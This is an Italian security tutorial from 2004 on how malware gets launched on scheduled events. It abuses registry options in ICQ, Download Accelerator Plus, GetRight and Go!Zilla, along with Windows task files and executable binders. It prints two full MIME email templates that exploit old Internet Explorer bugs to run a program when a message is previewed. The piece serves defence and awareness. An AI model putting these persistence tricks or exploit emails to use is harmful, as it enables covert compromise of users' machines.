pc-facile.com
http://www.pc-facile.com/guide/metodi_esecuzione_virus_spyware_malware/131.htm



Virus: hydra 20 Dicembre 04 @ 00:01 am

3. Esecuzione ad evento prestabilito

Questa metodologia poco utilizzata, è "nata" da poco ma sta riscotendo parecchi risultati.
Non si sfruttano bugs del sistema operativo o utilizzano metodologie più o meno consone per l'esecuzione, semplicemente si attaccano le opzioni di tutti quei programmi che possono fungere da rampa di lancio per l'applicazione nociva.

Essendo un argomento in via di studio e sviluppo, sta a noi contribuire ad elencare quali siano tutti quei programmi, opzioni e chiavi che possono essere attaccate.

Dando per scontato che un malintenzionato "costringa" l'utente ad eseguire un file, come può questo influenzare o modificare l'esecuzione successiva dello stesso o di una sua versione modificata ?
Semplicemente inserendo un link al proprio eseguibile all'interno di conosciute ( ma spesso inutilizzate ) opzioni di programmi che troppo spesso non vengono controllate.

Con un eseguibile è possibile :

Creare un file *.job ed inserirlo nella cartella C:\WINDOWS\TASKS.

Questo file, di poche, pochissime centinaia di byte è il responsabile dell'avvio di un eseguibile ( presente sottoforma di link al suo interno ) ad evento prestabilito ( ogni giorno, ogni settimana, ogni mese, una volta sola, all'avvio del sistema, all'accesso dell'utente, quando il pc è inattivo ).
I file *.job sono infatti files appositamente creati ( dall'utente o da alcuni programmi ) tramite le Operazioni Pianificate raggiungibili dal Pannello di Controllo. Questo è il primo di alcuni esempi di come un malintenzionato possa sfruttare queste opzioni a suo favore.

E' anche possibile inserire valori o modificare quelli già presenti all'interno delle opzioni di ICQ, raggiungibili dalle stringhe :

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\nomescelto
[HKEY_LOCAL_MACHINE\ Software\Mirabilis\ICQ\Agent\Apps\nomescelto


dove "nomescelto" rappresenta il nome della funzione che esegue patch.exe come specificato all'interno dello stesso :

"Path"="patch.exe"
"Startup"="c:\"
"Parameters"="parametro_a_scelta"
"Enable"="Yes"

In questo modo ogniqualvolta il NETDetect di ICQ ( spesso lasciato come da installazione all'interno dell'esecuzione automatica in ( [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] ) rilevi la connessione internet, patch.exe verrà eseguito, con addirittura la possibilità di assegnargli parametri ("Parameters"="parametro_a_scelta" )

Altra possibilità è quella di utilizzate le opzioni di alcuni dei più noti Software per il download.

Prendendo in considerazione DAP ( Download Accelerator Plus ) è possibile sfruttare la possibilità di scansire il file appena scaricato con l'antivirus presente sul sistema per far eseguire, ad ogni fine download, patch.exe, modificando le chiavi di registro pertinenti alle impostazioni del programma.

La chiave è :

HKEY_LOCAL_MACHINE\SOFTWARE\SpeedBit\Download Accelerator\


Modificando il valore di AntiVirusEXE , di AntiVirusOptions e di AntivirusUse come segue :

AntiVirusEXE "C:\patch.exe"
AntiVirusOptions "parametro_a_scelta"
AntiVirusUse 0x00000001 (1) ( ne permette l'esecuzione )


è possibile obbligare il programma ad eseguire un eseguibile arbitrario e ad assegnargli parametri ( AntiVirusOptions " parametro_a_scelta " )

Un discorso analogo è possibile nei riguardi di GetRight, modificando semplicemente il contenuto della voce :

VirusScanner
( impostandone un valore del genere : VirusScanner ""C:\patch.exe"" )

all'interno della sotto chiave Config di GetRight :

HKEY_CURRENT_USER\Software\Headlight\GetRight\Config e

HKEY_USERS\.DEFAULT\Software\Headlight\GetRight\Config


Idem dicasi per il programma GO!Zilla. I valori così modificati permettono l'esecuzione di un eseguibile arbitrario :

do_virus_scan 0x00000000 (0) ( ne permette l'esecuzione )

e

virus_scan_command_line "C:\patch.exe"


Entrambi si trovano nelle chiavi :

HKEY_CURRENT_USER\Software\Radiate\Go!Zilla\options


e

HKEY_USERS\.DEFAULT\Software\Radiate\Go!Zilla\options


E' anche possibile fondere tra di loro due eseguibili, uno nocivo ed uno lecito in modo che l'utente, credendo di eseguire l'exe lecito e visualizzandone l'esecuzione normale, non si accorga dell'esecuzione in background nella parte nociva.
Esistono programmi che uniscono gli eseguibili, forniscono nuove icone e assegnano comportamenti diversi al file una volta caricato.
E' possibile, dopo l'esecuzione, far si che l'eseguibile "fuso" venga cancellato o modificato sostituendolo con il primo o secondo file utilizzato per crearlo. In questo modo, un malintenzionato essendo a conoscenza della presenza di un determinato eseguibile caricato manualmente dall'utente in particolari condizioni, può sfruttare questo metodo per lanciare un eseguibile ad evento prestabilito ( anche se, in questo caso, la sicurezza e la puntualità dell'esecuzione risultano lacunose, essendo richiesto l'intervento diretto dell'utente ).
Altra possibilità è quella, conoscendo l'esistenza o meno di un eseguibile lecito lanciato all'avvio in automatico, di fondere con quest'ultimo un eseguibile nocivo, in modo che l'utente, vedendo l'avvenuto caricamento di un file che lui stesso aveva inserito in esecuzione automatica, non dubiti o quantomeno non si accorga del parassita.
Anche questa tecnica presuppone una non superficiale conoscenza da parte dell'aggressore nei riguardi della vittima poiché è necessario essere a conoscenza ( tramite tecniche di sniffing, social engineering ecc.. ) dell'utilizzo ed esecuzione di programmi all'avvio del sistema attaccato.

Altro ed ultimo esempio è quello del famoso programma di posta elettronica fornito con Windows : Outlook Express ( ma lo stesso vale per qualsiasi mailbrowser che utilizzi IE ).

Quest'ultima metodologia non sfrutta le opzioni, bensì un noto bug delle versioni di Internet Explorer inferiori alla 5.5 per l'esecuzione degli allegati ed inferiori o uguali alla 6 non aggiornata per l'esecuzione di files in locale.
Pur sfruttando un bug ho preferito descrivere qui quanto sotto poiché è possibile eseguire files ad evento prestabilito : la ricezione e la visualizzazione in anteprima della posta in formato htm.

Quello che segue è il contenuto di una generica e non completa ( non personalizzata e indirizzata ) mail che avvierà un programma posizionato sulla macchina del destinatario qualora ne visualizzasse l'anteprima.

Non pensiate che gli eseguibili su una macchina non possano essere dannosi, basti pensare che un allegato è presente sulla macchina nel momento dell'apertura della mail ( in temp o altre cartelle, a discrezione del programma di posta utilizzato o dalle impostazioni fissate dall'utente ) pertanto questa metodologia è utilizzata anche su sistemi con IE aggiornato alle versione 6 e NON superiore per eseguire gli allegati ( considerati come presenti in locale in cartelle particolari ) altrimenti non eseguibili con il secondo script che proporrò dopo quello che sto per mostrare.
Date: #*DATEMessage Date*#
Message-ID: <#*MSGIDMessage-Id*#>
From: "/*Sender name*/" </*Sender account*/>
To: "/*Recipient name*/" </*Recipient account*/>
Subject: /*Subject*/
MIME-Version: 1.0
Content-Type: multipart/related;
boundary="----=_NextPart_000_0397_01C1C9DC.6A16ED00";
type="multipart/alternative"
X-Priority: 3
X-MSMail-Priority: Normal

------=_NextPart_000_0397_01C1C9DC.6A16ED00
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0398_01C1C9DC.6A16ED00"


------=_NextPart_001_0398_01C1C9DC.6A16ED00
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

/*Message*/

------=_NextPart_001_0398_01C1C9DC.6A16ED00
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft><FONT face=3DArial color=3D#000000 size=3D2>
/*Message*/
</FONT></DIV>
<DIV><BR>&nbsp;</DIV>
<span datasrc=3D"#oExec" datafld=3D"exploit" dataformatas=3D"html"></span>
<xml id=3D"oExec">
<security>
<exploit>
<![CDATA[
<object id=3D"oFile" classid=3D"clsid:11111111-1111-1111-1111-111111111111" codebase=3D"/*Program to run*/"></object>
]]>
</exploit>
</security>
</xml>
</BODY></HTML>

------=_NextPart_001_0398_01C1C9DC.6A16ED00--
------=_NextPart_000_0397_01C1C9DC.6A16ED00--


Con quest'altro codice è invece possibile eseguire l'allegato ( codificato in base 64 ) qualora la versione di IE fosse minore o uguale alla 5.5

Date: #*DATEMessage Date*#
Message-ID: <#*MSGIDMessage-Id*#>
From: "/*Sender name*/" </*Sender account*/>
To: "/*Recipient name*/" </*Recipient account*/>
Subject: /*Subject*/
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML>
<HEAD></HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe>
/*Message*/
</BODY>
</HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="/*Name of attachment*/"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

#*BASE64Attachment to run*#
--====_ABC1234567890DEF_====


Per evitare spiacevoli situazioni è quindi preferibile eseguire l'aggiornamento, se ancora non l'avete fatto, alla versione di Internet Explorer 6 con i relativi upgrade di patch cumulative.

In conclusione, per ovviare situazioni come le precedenti ( e vi assicuro che sono solo alcuni dei possibili esempi ) è doveroso controllare, di tanto in tanto, le opzioni dei programmi " a rischio", aspettando che il sottoscritto sviluppi un software che li monitorizzi.

Nuovi bug vengono continuamente scoperti e resi pubblici in modo da render più sicuro l'utilizzo ( da parte degli utenti ) delle macchine colpite da quel particolare bug. In attesa che il baco venga sanato da patch ufficiali rilasciate dalle case produttrici, è quindi buona regola informarsi sul loro funzionamento e con quali metodologie colpiscano il sistema, in modo da correre ai ripari aspettando l'aggiornamento dell' applicazione colpita.


Dalla stesura di questo tutorial sono state rese note altre vulnerabilità più o meno gravi ( alcune delle quali non ancora patchate ). E' bene quindi documentarsi su alcuni siti dedicati :

http://sec.greymagic.com/adv/
http://www.guninski.com/ ( attenzione alla sezione browsers.html )
http://www.securityfocus.com/
http://www.pivx.com/larholm/unpatched/

I bug più significativi verranno sicuramente trattati e discussi sul forum stesso di !pc-facile.





© 2000-2024 pc-facile.com